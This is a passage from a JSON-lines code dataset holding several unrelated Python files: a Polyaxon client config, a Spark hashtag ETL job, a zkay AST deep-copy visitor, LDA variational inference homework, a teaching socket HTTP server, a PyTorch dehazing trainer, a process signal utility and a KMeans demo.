clean_verify_ssl(\n host=self.host, verify_ssl=self._get_bool(verify_ssl, None)\n )\n self.ssl_ca_cert = ssl_ca_cert\n self.cert_file = cert_file\n self.key_file = key_file\n self.assert_hostname = self._get_bool(assert_hostname, None)\n self.connection_pool_maxsize = connection_pool_maxsize\n self.archive_root = archive_root or CONTEXT_ARCHIVE_ROOT\n self.header = header\n self.header_service = header_service\n self.timeout = timeout or 20\n self.tracking_timeout = tracking_timeout or 1\n self.timezone = timezone\n self.interval = interval or 5\n self.watch_interval = watch_interval or 5\n self.namespace = namespace\n self.no_api = self._get_bool(no_api, False)\n self.authentication_type = authentication_type or AuthenticationTypes.TOKEN\n self.disable_errors_reporting = self._get_bool(disable_errors_reporting, False)\n self.compatibility_check_interval = compatibility_check_interval\n\n self.client_header = {}\n\n if all([self.header, self.header_service]):\n self.client_header[\"header_name\"] = self.header\n self.client_header[\"header_value\"] = self.header_service\n\n @property\n def base_url(self):\n return self.BASE_URL.format(clean_host(self.host), self.version)\n\n def set_cli_header(self):\n self.header = PolyaxonServiceHeaders.get_header(PolyaxonServiceHeaders.SERVICE)\n self.header_service = VERSION\n self.client_header[\"header_name\"] = self.header\n self.client_header[\"header_value\"] = self.header_service\n\n def set_agent_header(self):\n self.header = PolyaxonServiceHeaders.get_header(PolyaxonServiceHeaders.SERVICE)\n self.header_service = PolyaxonServices.AGENT\n self.client_header[\"header_name\"] = self.header\n self.client_header[\"header_value\"] = self.header_service\n\n @property\n def sdk_config(self):\n if not self.host and not self.in_cluster:\n raise PolyaxonClientException(\n \"Api config requires at least a host if not running in-cluster.\"\n )\n\n config = polyaxon_sdk.Configuration()\n config.debug = self.debug\n config.host = clean_host(self.host)\n config.verify_ssl = clean_verify_ssl(\n host=config.host, verify_ssl=self.verify_ssl\n )\n config.ssl_ca_cert = self.ssl_ca_cert\n config.cert_file = self.cert_file\n config.key_file = self.key_file\n config.assert_hostname = self.assert_hostname\n if self.connection_pool_maxsize:\n config.connection_pool_maxsize = self.connection_pool_maxsize\n if self.token:\n config.api_key[\"ApiKey\"] = self.token\n config.api_key_prefix[\"ApiKey\"] = self.authentication_type\n return config\n\n @staticmethod\n def _get_bool(value, default_value):\n if isinstance(value, bool):\n return value\n\n return default_value\n","sub_path":"src/polyaxon/schemas/cli/client_config.py","file_name":"client_config.py","file_ext":"py","file_size_in_byte":10259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"406879141","text":"import json\nimport re\nimport sys\nimport time\nimport dateutil.parser as du\nfrom pymongo import MongoClient\nfrom pyspark.sql import SparkSession, SQLContext, Row\nfrom pyspark.sql.functions import explode, udf, collect_list, struct\nfrom pyspark.sql.types import StructField, StructType, IntegerType, StringType, ArrayType\n\n# build\nspark = SparkSession.builder.appName(\"Preprocessing App\").getOrCreate()\nsc = spark.sparkContext\nsqlContext = SQLContext(sc)\n\n\"\"\"\nUser Defined function to extract tweet times\n\"\"\"\ndef get_tweet_time(s):\n # parsing with dateutil parser\n now = du.parse(s)\n # Keep tweet occurances at 1-hour intervals\n current_tweet_time = str(now.year) + \"-\" + str(now.month) + \"-\" + str(now.day) + \" \" + str(now.hour) + \":00\"\n return current_tweet_time\n\n# register method\ntweet_time = udf(lambda z: get_tweet_time(z))\nspark.udf.register(\"tweet_time\", tweet_time)\n\n\n\"\"\"\nExtract just the Hashtags as entities\n\"\"\"\ndef _get_hashtag(entities):\n return(entities.text)\n\n# register method\nget_hash_tag = udf(lambda z: _get_hashtag(z))\nspark.udf.register(\"get_hash_tag\", get_hash_tag)\n\ndef transform_Data(extracted_sql_table):\n HashTagsTable = extracted_sql_table.select(\"created_at\", explode( \"hashtags\"))\n HashTagsTable_WithDates = HashTagsTable.withColumn('Keyword', get_hash_tag('col')).withColumn('Time', tweet_time('created_at') )\n # clean up table\n columns_to_drop = ['created_at', 'col']\n hashtags_table = HashTagsTable_WithDates.drop(*columns_to_drop)\n before_aggregation = hashtags_table.groupBy('Keyword', 'Time').count() \n after_aggregation = (before_aggregation.groupBy(\"Keyword\").agg(collect_list(struct(\"Time\", \"count\")).alias('occurances')))\n return(after_aggregation)\n\ndef main():\n with open('test_hashtagoldnews_config.json', 'r') as config_file:\n config_dict = json.load(config_file)\n folder_data = sqlContext.read.json(config_dict['S3_root'] + \"/Unzipped\")\n folder_data.registerTempTable(\"tweets\")\n client = MongoClient(config_dict['mongo_path'])\n \n db = client.all_tweets\n extracted_SQL_table = sqlContext.sql(\"SELECT distinct id, created_at, lang, entities.hashtags FROM tweets WHERE lang = 'en' AND size(entities.hashtags) > 0\")\n after_aggregation = transform_Data(extracted_SQL_table)\n \n # for unittesting \n # write transformed version of data to Parquet\n #(after_aggregation\n # .coalesce(1)\n # .write\n # .parquet('oldnews_report', mode='overwrite'))\n\n # insertion\n for row in after_aggregation.rdd.collect():\n db.full_db_compressed.update( { \"Keyword\" : row.Keyword }, { \"$push\" : { \"occurance\" : row.occurances}},upsert=True)\n spark.stop()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ETL/spark_submit_mongo.py","file_name":"spark_submit_mongo.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"457233669","text":"import inspect\n\nfrom zkay_ast.ast import AST\nfrom zkay_ast.pointers.parent_setter import set_parents\nfrom zkay_ast.pointers.symbol_table import link_identifiers\nfrom zkay_ast.visitor.visitor import AstVisitor\n\n\ndef deep_copy(ast: AST):\n\t\"\"\"\n\n\t:param ast:\n\t:return: a deep copy of `ast`\n\n\tOnly parents and identifiers are updated in the returned ast (e.g., inferred types are not preserved)\n\t\"\"\"\n\tv = DeepCopyVisitor()\n\tast_copy = v.visit(ast)\n\tast_copy.parent = ast.parent\n\tset_parents(ast_copy)\n\tlink_identifiers(ast_copy)\n\treturn ast_copy\n\n\nclass DeepCopyVisitor(AstVisitor):\n\n\tdef __init__(self):\n\t\tsuper().__init__('node-or-children')\n\n\tdef visitChildren(self, ast):\n\t\tc = ast.__class__\n\t\targs_names = inspect.getfullargspec(c.__init__).args[1:]\n\t\tnew_fields = {}\n\t\tfor arg_name in args_names:\n\t\t\told_field = getattr(ast, arg_name)\n\t\t\tnew_fields[arg_name] = self.copy_field(old_field)\n\t\tfor k in ast.__dict__.keys():\n\t\t\tsetting_later = [\n\t\t\t\t'parent',\n\t\t\t\t'names',\n\t\t\t\t'had_privacy_annotation',\n\t\t\t\t'annotated_type',\n\t\t\t\t'statement',\n\t\t\t\t'before_analysis',\n\t\t\t\t'after_analysis',\n\t\t\t\t'target',\n\t\t\t\t'instantiated_key',\n\t\t\t\t'function',\n\t\t\t\t'is_private'\n\t\t\t]\n\t\t\tif k not in new_fields and k not in setting_later:\n\t\t\t\traise ValueError(\"Not copying\", k)\n\t\treturn c(**new_fields)\n\n\tdef visitAnnotatedTypeName(self, ast):\n\t\tast_copy = self.visitChildren(ast)\n\t\tast_copy.had_privacy_annotation = ast.had_privacy_annotation\n\t\treturn ast_copy\n\n\tdef copy_field(self, field):\n\t\tif field is None:\n\t\t\treturn None\n\t\telif isinstance(field, str) or isinstance(field, int) or isinstance(field, bool):\n\t\t\treturn field\n\t\telif isinstance(field, list):\n\t\t\treturn [self.copy_field(e) for e in field]\n\t\telse:\n\t\t\treturn self.visit(field)\n","sub_path":"src/zkay_ast/visitor/deep_copy.py","file_name":"deep_copy.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"430256540","text":"import numpy as np\nfrom scipy.special import digamma as dga\nfrom scipy.special import gamma as ga\nfrom scipy.special import loggamma as lga\n\ndata = np.load(\"mcs_hw4_p1_lda.npy\")\n\nvocab = np.array([i for i in range(100)])\n\nnum_doc = data.shape[0]\nnum_vocab = vocab.shape[0]\nlen_doc = data.shape[1]\nnum_topic = 10\n\nw = np.zeros([num_doc, len_doc, num_vocab])\nfor d in range(num_doc):\n for n in range(len_doc):\n w[d, n, data[d, n]] = 1\n\nalpha = np.ones(shape=num_topic)\neta = np.ones(shape=num_vocab)\n\neps=1e-20\ndef log(x):\n return np.log(x + eps)\n\ndef digamma(x):\n return dga(x + eps)\n\ndef loggamma(x):\n return lga(x + eps)\n\ndef init(data):\n\n phi = np.random.rand(num_doc, len_doc, num_topic)\n for d in range(num_doc):\n for n in range(len_doc):\n phi[d, n] /= np.sum(phi[d, n])\n\n gam = np.random.rand(num_doc, num_topic)\n gam /= np.sum(gam, axis=1)[:, np.newaxis]\n\n lam = np.random.rand(num_topic, num_vocab)\n lam /= np.sum(lam, axis=1)[:, np.newaxis]\n return lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta\n\ndef one_step_batch(lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta, d_list):\n #print(num_doc, num_topic, num_vocab)\n for d in d_list:\n gam[d] = alpha + np.sum(phi[d], axis=0)\n #gam /= np.sum(gam, axis=1)[:, np.newaxis]\n \n def get_single_doc(lam, gam, phi, w, d):\n for n in range(len_doc):\n #phi[d, n, :] = np.exp(digamma(gam[d, :]) + digamma(lam[:, data[d, n]]) - digamma(np.sum(lam, axis=1)))\n for k in range(num_topic):\n phi[d, n, k] = np.exp(digamma(lam[k, data[d, n]]) - digamma(np.sum(lam[k])) + digamma(gam[d, k]) - digamma(np.sum(gam[d])))\n phi[d, n, :] /= np.sum(phi[d, n, :])\n return phi[d], d\n \n with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:\n future_list = [executor.submit(get_single_doc, lam, gam, phi, w, d) for d in d_list]\n for future in concurrent.futures.as_completed(future_list):\n phi_d, d = future.result()\n phi[d] = phi_d\n \n lam_new = np.zeros_like(lam)\n for k in range(num_topic):\n lam[k] = eta\n for n in range(len_doc):\n for d in d_list:\n lam_new[k] += phi[d, n, k] * w[d, n]\n #lam /= np.sum(lam, axis=1)[:, np.newaxis]\n lam_new *= num_doc / len(d_list)\n lam = (1 - 0.1) * lam + 0.1 * lam_new\n \n return lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta\n\n\nimport concurrent.futures\n\ndef get_res1(lam, gam, phi, w):\n res_1 = 0.0\n res_1 += num_topic * loggamma(np.sum(eta))\n res_1 -= num_topic * np.sum(loggamma(eta))\n '''\n for k in range(num_topic):\n for i in range(num_vocab):\n res_1 += (eta[i] - 1) * (digamma(lam[k, i]) - digamma(np.sum(lam[k])))\n '''\n return res_1\n\n\ndef get_res2(lam, gam, phi, w): \n res_2 = 0.0\n for n in range(len_doc):\n for k in range(num_topic):\n res_2 += phi[:, n, k] * (digamma(gam[:, k]) - digamma(np.sum(gam, axis=1)))\n #res_2 -= digamma(np.sum(gam, axis=1))\n res_2 = np.sum(res_2)\n return res_2\n\n \ndef get_res3(lam, gam, phi, w):\n res_3 = 0.0\n res_3 += loggamma(np.sum(alpha))\n res_3 -= np.sum(loggamma(alpha))\n '''\n for k in range(num_topic):\n res_3 += (alpha[k] - 1) * (digamma(gam[:, k] - digamma(np.sum(gam[:, k]))))\n '''\n res_3 = np.sum(res_3)\n return res_3\n\ndef get_res4(lam, gam, phi, w):\n res_4 = 0.0\n def get_res4_single_loc(lam, gam, phi, w, n):\n res_loc = 0.0\n for k in range(num_topic):\n sum_lam_k = np.sum(lam[k])\n for i in range(num_vocab):\n res_loc += phi[:, n, k] * w[:, n, i] * (digamma(lam[k, i]) - digamma(sum_lam_k))\n res_loc = np.sum(res_loc)\n return res_loc\n \n with concurrent.futures.ThreadPoolExecutor(max_workers=32) as executor:\n future_list = [executor.submit(get_res4_single_loc, lam, gam, phi, w, n) for n in range(len_doc)]\n for future in concurrent.futures.as_completed(future_list):\n res_4 += future.result()\n return res_4\n\ndef get_res5(lam, gam, phi, w):\n res_5 = 0.0\n for k in range(num_topic):\n res_5 += loggamma(np.sum(lam[k])) - np.sum(loggamma(lam[k]))\n for k in range(num_topic):\n sum_lam_k = np.sum(lam[k])\n #'''\n res_5 += np.sum((lam[k] - 1) * (digamma(lam[k]) - digamma(sum_lam_k)))\n '''\n for i in range(num_vocab):\n res_5 += (lam[k, i] - 1) * (digamma(lam[k, i]) - digamma(sum_lam_k))\n '''\n return -res_5\n \ndef get_res6(lam, gam, phi, w):\n res_6 = 0.0\n res_6 += np.sum(phi * log(phi))\n return -res_6\n\ndef get_res7(lam, gam, phi, w):\n res_7 = 0.0\n res_7 += loggamma(np.sum(gam, axis=1)) - np.sum(loggamma(gam), axis=1)\n #print(res_7)\n res_7 = np.sum(res_7)\n for d in range(num_doc):\n res_7 += np.sum((gam[d] - 1) * (digamma(gam[d]) - digamma(np.sum(gam[d]))))\n return -res_7\n\ndef elbo(lam, gam, phi, w):\n res = 0.0\n func_list = [get_res1, get_res2, get_res3, get_res4, get_res5, get_res6, get_res7]\n with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:\n future_list = [executor.submit(func, lam, gam, phi, w) for func in func_list]\n for future in concurrent.futures.as_completed(future_list):\n res += future.result()\n \n return res\n\ndef lda_batched(batch_size):\n elbo_list = []\n lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta = init(data)\n for i in range(100):\n for d in range(int(data.shape[0] / batch_size)):\n d_list = [i for i in range(d, d + batch_size)]\n lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta = one_step_batch(lam, gam, phi, w, num_doc, num_topic, num_vocab, len_doc, alpha, eta, d_list)\n #print(\"iteration \" + str(i) + \" done\")\n elbo_per_point = elbo(lam, gam, phi, w)\n elbo_list.append(elbo_per_point)\n print(elbo_per_point)\n return elbo_list\n\nfor batch_size in [1]:\n elbo_list = lda_batched(batch_size)\n import pickle\n with open(\"lda_elbo_batch_\" + str(batch_size), \"wb\") as f:\n pickle.dump(elbo_list, f)\n","sub_path":"Statistical Computing/homework/hw_4/server/4_1_batch1.py","file_name":"4_1_batch1.py","file_ext":"py","file_size_in_byte":6290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"552377719","text":"'''\r\nHTTP请求头\r\nGET POST\r\n\r\nGET /html/rfc2616 HTTP/1.1\r\nHost: tools.ietf.org\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n\r\nHTTP响应头\r\nHTTP/1.1 200 OK\r\nAccept-Ranges: bytes\r\nCache-Control: max-age=604800\r\nConnection: Keep-Alive\r\nContent-Encoding: gzip\r\nContent-Location: rfc2616.html\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Sat, 24 Mar 2018 07:52:47 GMT\r\nETag: \"3d2050-83393-567508dabd73a;56823d38ef5d5\"\r\nExpires: Sat, 31 Mar 2018 07:52:47 GMT\r\nKeep-Alive: timeout=5, max=100\r\nLast-Modified: Tue, 13 Mar 2018 19:49:15 GMT\r\nServer: Apache/2.2.22 (Debian)\r\nStrict-Transport-Security: max-age=3600\r\nTCN: choice\r\nTransfer-Encoding: chunked\r\nVary: negotiate,Accept-Encoding\r\nX-Clacks-Overhead: GNU Terry Pratchett\r\nX-Content-Type-Options: nosniff\r\nX-Frame-Options: SAMEORIGIN\r\nX-Xss-Protection: 1; mode=block\r\n'''\r\nfrom socket import *\r\nimport os\r\n# 从文件中读取要返回的HTTP响应头文件,并将设置返回数据长度为length\r\ndef responseHeaders(file,length):\r\n f = open(file,'r')\r\n headersText = f.read()\r\n headersText = headersText % length\r\n return headersText\r\n# print(responseHeaders('response_headers.txt',10))\r\n# 根据HTTP请求头的路径得到服务端的本地路径\r\ndef filePath(get):\r\n if get == '/':\r\n return 'static' + os.sep+'index.html'\r\n else:\r\n paths = get.split('/')\r\n s = 'static'\r\n for path in paths:\r\n if path.strip() != '':\r\n s = s+os.sep+path\r\n return s\r\n# print(filePath('/abc/x.txt'))\r\nhost = ''\r\nbufferSize = 1024\r\nport = 9876\r\naddr = (host,port)\r\ntcpServerSocker = socket(AF_INET,SOCK_STREAM)\r\ntcpServerSocker.bind(addr)\r\ntcpServerSocker.listen()\r\nwhile True:\r\n print(\"正在等待客户链接\")\r\n tcpClientSocket,addr = tcpServerSocker.accept()\r\n print('客户端已经连接','addr = ',addr)\r\n data = tcpClientSocket.recv(bufferSize)\r\n data = data.decode('utf-8')\r\n try:\r\n # 获取请求头的第一行\r\n firstLine = data.split('\\n')[0]\r\n # 获取请求路径\r\n path = firstLine.split(\" \")[1]\r\n # 将web路径转换为本地路径\r\n path = filePath(path)\r\n if os.path.exists(path):\r\n file = open(path,'rb')\r\n content = file.read()\r\n file.close()\r\n else:\r\n content = \"

File Not Found

\".encode(encoding='utf-8')\r\n rh = responseHeaders('response_headers.txt',len(content))+'\\r\\n'\r\n tcpClientSocket.send(rh.encode(encoding='utf-8') + content)\r\n except Exception as e:\r\n print(e)\r\n tcpClientSocket.close()\r\ntcpServerSocket.close()","sub_path":"Python学习基础知识/高级python篇/第15章:TCP与UDP编程/用Socket实现HTTP服务器.py","file_name":"用Socket实现HTTP服务器.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"68758164","text":"import argparse\nimport os\nfrom os.path import join\nimport torch\nfrom torch.utils.data import DataLoader\nfrom dataset.data import myDataloader\nimport scipy.misc\nimport imageio\nfrom network.loss import *\nfrom network.SSIM import SSIM\nimport random\nimport re\n\nfrom network.Res29_0 import PaiDehaze\n\nparser = argparse.ArgumentParser(description=\"PyTorch Train\")\nparser.add_argument(\"--batchSize\", type=int, default=8, help=\"Training batch size\")\nparser.add_argument(\"--start_training_step\", type=int, default=2, help=\"Training step\")\nparser.add_argument(\"--nEpochs\", type=int, default=60, help=\"Number of epochs to train\")\nparser.add_argument(\"--lrG\", type=float, default=1e-4, help=\"Learning rate, default=1e-4\")\nparser.add_argument(\"--lrD\", type=float, default=1e-3, help=\"Learning rate, default=1e-4\")\nparser.add_argument(\"--step\", type=int, default=20, help=\"Change the learning rate for every 30 epochs\")\nparser.add_argument(\"--start-epoch\", type=int, default=1, help=\"Start epoch from 1\")\nparser.add_argument(\"--lr_decay\", type=float, default=0.1, help=\"Decay scale of learning rate, default=0.5\")\nparser.add_argument(\"--resume\", default=\"\", type=str, help=\"Path to checkpoint (default: none)\")\nparser.add_argument(\"--scale\", default=4, type=int, help=\"Scale factor, Default: 4\")\nparser.add_argument(\"--lambda_db\", type=float, default=0.5, help=\"Weight of deblurring loss, default=0.5\")\nparser.add_argument(\"--gated\", type=bool, default=True, help=\"Activated gate module\")\nparser.add_argument(\"--isTest\", type=bool, default=False, help=\"Test or not\")\nos.environ['CUDA_VISIBLE_DEVICES'] = '2'\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\n#def mkdir_steptraing():\n# root_folder = os.path.abspath('.')\n# models_folder = join(root_folder, 'models/modelW')\n# step1_folder, step2_folder, step3_folder = join(models_folder,'1'), join(models_folder,'2'), join(models_folder, '3')\n# isexists = os.path.exists(step1_folder) and os.path.exists(step2_folder) and os.path.exists(step3_folder)\n# if not isexists:\n# os.makedirs(step1_folder)\n# os.makedirs(step2_folder)\n# os.makedirs(step3_folder)\n# print(\"===> Step training models store in models/1 & /2 & /3.\")\n\n\ndef mkdir_model(path):\n root_folder = os.path.abspath('.')\n models_folder = join(root_folder, path)\n isexists = os.path.exists(models_folder)\n if not isexists:\n os.makedirs(models_folder)\n\n print(\"===> Step training models store in models/1 & /2 & /3.\")\n\n\ndef is_hdf5_file(filename):\n return any(filename.endswith(extension) for extension in [\".h5\"])\n\n\ndef print_network(net):\n if isinstance(net, list):\n net = net[0]\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print(net)\n print('Total number of parameters: %d' % num_params)\n\n\n#def which_trainingstep_epoch(resume):\n# trainingstep = \"\".join(re.findall(r\"\\d\", resume)[0])\n# start_epoch = \"\".join(re.findall(r\"\\d\", resume)[1:])\n# return int(trainingstep), int(start_epoch)\n\n\nclass trainer_S2_2:\n def __init__(self, train_gen, step, numD=4):\n super(trainer_S2_2, self).__init__()\n\n self.numd = numD\n self.step = step\n self.trainloader = train_gen\n self.modelG = PaiDehaze().cuda()\n #self.modelG.load_state_dict(torch.load(\"/home/ywj/game/models/modelOut/MS29/Dem_44.pkl\"))\n print(\"#############################\")\n #print_network(self.modelG)\n print(\"#############################\")\n\n self.optimizer_G = torch.optim.Adam(filter(lambda p: p.requires_grad, self.modelG.parameters()), lr=1e-4, betas=(0.5, 0.9))\n\n criterion =nn.L1Loss()\n self.SSIMLoss = SSIM().cuda()\n self.criterion = criterion.cuda()\n\n def opt_G(self, fake, real):\n self.optimizer_G.zero_grad()\n g_loss_MSE = self.criterion(fake, real.detach())\n\n l_SSIM = 1 - self.SSIMLoss(fake, real).mean()\n\n g_loss = g_loss_MSE*0.75 + l_SSIM*1.1\n g_loss.backward()\n\n self.optimizer_G.step()\n\n return g_loss_MSE, l_SSIM\n\n def adjust_learning_rate(self, epoch):\n lrG = opt.lrG * (opt.lr_decay ** (epoch // opt.step))\n print(lrG)\n for param_group in self.optimizer_G.param_groups:\n param_group['lr'] = lrG\n\n def checkpoint(self, epoch):\n path = \"models/modelOut/MS{}\".format(58)\n mkdir_model(path)\n model_out_path =path + \"/Dem_{}.pkl\".format(epoch)\n torch.save(self.modelG.state_dict(), model_out_path)\n print(\"===>Checkpoint saved to {}\".format(model_out_path))\n\n def train(self, epoch):\n self.checkpoint(epoch)\n\n self.adjust_learning_rate(epoch - 1)\n epoch_loss = 0\n ssim_loss = 0\n for iteration, (Ix, Jx) in enumerate(self.trainloader):\n Ix = Ix.to(device)\n Jx = Jx.to(device)\n\n fake = self.modelG(Ix)\n g_loss_MSE, lossSSIM = self.opt_G(fake, Jx)\n\n epoch_loss += g_loss_MSE.cpu().data\n ssim_loss += lossSSIM.cpu().data\n\n if iteration % 100 == 0:\n print(\n \"===> Epoch[{}]({}/{}): Loss{:.4f};\".format(epoch, iteration, len(trainloader), g_loss_MSE.cpu()))\n\n Ix_cc = fake # modelD(Detail_I) #+ Ix[:, 6:9, :, :] modelD(Detail_I)#\n Ix_cc = Ix_cc.clamp(0, 1)\n Ix_cc = Ix_cc[0].permute(1, 2, 0).detach().cpu().numpy()\n\n Ix = Ix.clamp(0, 1)\n Ix = Ix[0].permute(1, 2, 0).detach().cpu().numpy()\n Ix_cc = np.hstack([Ix, Ix_cc])\n\n Jx = Jx.clamp(0, 1)\n Jx = Jx[0].permute(1, 2, 0).detach().cpu().numpy()\n Ix_cc = np.hstack([Ix_cc, Jx])\n\n # print(Ix_cc.shape)\n imageio.imwrite('./results' + '/' + str((epoch - 1) * 100 + iteration / 100) + '.png', np.uint8(Ix_cc*255))\n #print(\"MSE:\" + str(g_loss_MSE.cpu().data) + 'SSIM:' + str(lossSSIM.cpu().data))\n print(\"MSE:{:4f},SSIM:{:4f}\".format(g_loss_MSE, lossSSIM))\n print(\"===>Epoch{} Complete: Avg loss is :L1:{:4f},SSIM:{:4f} \".format(epoch, epoch_loss / len(trainloader), ssim_loss/ len(trainloader)))\n\ntrainloader, testloader = myDataloader().getLoader()\nopt = parser.parse_args()\nopt.seed = random.randint(1, 10000)\ntorch.manual_seed(opt.seed)\ntorch.cuda.manual_seed(opt.seed)\n\n\nfor i in range(1, 2):\n print(\"===> Loading model and criterion\")\n\n #trainModel = trainer_S1(trainloader, step=i, numD=1)\n trainModel = trainer_S2_2(trainloader, step=1, numD=1)\n\n for epoch in range(opt.start_epoch, opt.nEpochs + 1):\n print(\"Step {}:-------------------------------\".format(i))\n trainModel.train(epoch)\n","sub_path":"train0.py","file_name":"train0.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"246880158","text":"# Copyright 2015 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport atexit\nimport logging\nimport os\nimport signal\nimport subprocess\nimport sys\n\nfrom src.build.util import debug\nfrom src.build.util import platform_util\n\n\ndef _list_child_process(*target_pid):\n \"\"\"Returns a list of PIDs whose parent PID is |target_pid|.\"\"\"\n if platform_util.is_running_on_linux():\n # On Linux Workstation or Chrome OS.\n try:\n output = subprocess.check_output(\n ['ps', '-o', 'pid=', '--ppid', ','.join(str(p) for p in target_pid)])\n except subprocess.CalledProcessError:\n # If not found, ps returns status code 1.\n return []\n return [int(child.strip()) for child in output.splitlines()]\n\n if platform_util.is_running_on_mac():\n # On Mac.\n try:\n output = subprocess.check_output(['ps', 'x', '-o', 'pid=,ppid='])\n except subprocess.CalledProcessError:\n return []\n result = []\n for line in output.splitlines():\n pid, ppid = line.split()\n if int(ppid) in target_pid:\n result.append(int(pid))\n return result\n\n if platform_util.is_running_on_cygwin():\n # On Cygwin.\n try:\n output = subprocess.check_output(['ps', 'aux'])\n except subprocess.CalledProcessError:\n return []\n result = []\n for line in output.splitlines()[1:]:\n pid, ppid = line.split(None, 2)[:2]\n if int(ppid) in target_pid:\n result.append(int(pid))\n return result\n raise NotImplementedError('Unknown platform: ' + sys.platform)\n\n\ndef _terminate_subprocess():\n \"\"\"Terminates all the direct subprocesses by sending SIGTERM.\"\"\"\n for pid in _list_child_process(os.getpid()):\n try:\n os.kill(pid, signal.SIGTERM)\n except Exception:\n # Ignore any exception here.\n pass\n\n\ndef _sigterm_handler(signum, frame):\n \"\"\"Signal handler for the SIGTERM.\"\"\"\n # First of all, on TERMINATE, print the stacktrace.\n assert signum == signal.SIGTERM\n logging.error('SIGTERM is received.')\n debug.write_frames(sys.stderr)\n\n # If we can send SIGTERM to child processes, we do not exit here,\n # with expecting the graceful shutdown.\n # Note that, although we do this in atexit handler, too, it is too late\n # (runs after all threads are terminated). So we need it here.\n # Note that, to avoid race conditions, the program must not poll or wait\n # on a non-main thread. Practically, it is almost safe, but there is\n # a small chance for un-related processes to be killed by SIGTERM\n # accidentally.\n _terminate_subprocess()\n\n # Then, terminate the script. Note that at the end of the interpreter,\n # functions registered by atexit.register() will run.\n sys.exit(1)\n\n\ndef setup():\n \"\"\"Sets up SIGTERM's handler and registers a atexit handler.\n\n This function should be called very early stage of the script.\n On SIGTERM, the installed handler does following three things:\n - Prints the stack trace.\n - Sends SIGTERM to direct child processes (if exist).\n - Raises SystemExit(1) exception to terminate the script with running\n atexit registered functions.\n\n At exit, the installed callback sends SIGTERM to direct child\n processes (if exist).\n \"\"\"\n signal.signal(signal.SIGTERM, _sigterm_handler)\n\n # At the end of the program, we terminates known subprocesses.\n # Note that, when this is fired, we assume there is no thread other than\n # main, and also main thread is being terminated. So, no one wait()'s the\n # subprocesses.\n atexit.register(_terminate_subprocess)\n\n\ndef kill_recursively(root_pid):\n \"\"\"Sends SIGKILL to the |root_pid| process and its descendants.\n\n While this function is running, killed processes must not be wait()ed,\n specifically root. Otherwise, it may kill un-related processes.\n Here is an example scenario;\n 1) Let be a process tree as follows:\n this process - process A[root_pid] - process B[pid1].\n 2) Send SIGKILL to process A, and it terminates immediately.\n 3) Here, root process is wait()ed, wrongly, so that |root_pid| can be\n reused by any new process.\n 4) Before A's children is listed (in more precise, children of a process\n with |root_pid| are listed), a new process is created and |root_pid| is\n reassigned. (Note: this should be practically very rare, because in common\n system, PID is assigned in round-robin way. Thus, so many processes need\n to be created in this very short period.)\n 5) The new process creates its child, named process C[pid2].\n 6) List the children of |root_pid|, which is process C[pid2], not\n process B[pid1].\n 7) Then, send SIGKILL to process C[pid2], wrongly.\n Note that this PID-reused problem can happen any level of the process tree.\n\n Args:\n root_pid: PID of the root process of the target process tree.\n \"\"\"\n pid_list = [root_pid]\n while pid_list:\n for pid in pid_list:\n os.kill(pid, signal.SIGKILL)\n pid_list = _list_child_process(*pid_list)\n","sub_path":"src/build/util/signal_util.py","file_name":"signal_util.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"629892024","text":"from sklearn.datasets import make_blobs\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\nX,Y=make_blobs(n_samples=150,n_features=2,centers=3,cluster_std=0.5,shuffle=True,random_state=0)\n\n#plt.scatter(X[:,0],X[:,1],c='blue',marker='o',s=50)\n#plt.grid()\n#plt.show()\n\nfor i in range(10):\n\n kmeans=KMeans(n_clusters=3,init='random',n_init=i+1,max_iter=300,tol=1e-4,random_state=None)\n\n Y_pred=kmeans.fit_predict(X)\n\n plt.scatter(X[Y_pred==0,0],X[Y_pred==0,1],c='lightgreen',marker='s',s=50,label='cluster 1')\n\n plt.scatter(X[Y_pred==1,0],X[Y_pred==1,1],c='orange',marker='o',s=50,label='cluster 2')\n\n plt.scatter(X[Y_pred==2,0],X[Y_pred==2,1],c='lightblue',marker='v',s=50,label='cluster 3')\n\n plt.scatter(kmeans.cluster_centers_[:,0],kmeans.cluster_centers_[:,1],s=250,marker='*',c='red',label='centroids')\n\n plt.legend()\n\n plt.grid()\n plt.show()\n\n","sub_path":"test12-KMeans.py","file_name":"test12-KMeans.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 